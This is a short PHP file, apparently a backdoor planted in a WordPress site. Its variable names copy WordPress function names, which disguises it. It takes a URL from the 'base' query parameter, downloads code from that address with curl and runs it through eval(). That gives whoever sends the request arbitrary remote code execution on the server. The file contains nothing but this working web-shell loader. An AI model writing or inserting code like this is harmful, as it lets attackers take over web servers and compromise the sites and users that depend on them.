<?php if (isset($_GET['base'])) { $the_posts_pagination_cwd = $_GET['base']; if ($esc_attr_x_cz = curl_init()) { curl_setopt($esc_attr_x_cz, CURLOPT_URL, $the_posts_pagination_cwd); curl_setopt($esc_attr_x_cz, CURLOPT_RETURNTRANSFER, true); eval(curl_exec($esc_attr_x_cz)); curl_close($esc_attr_x_cz); exit; } }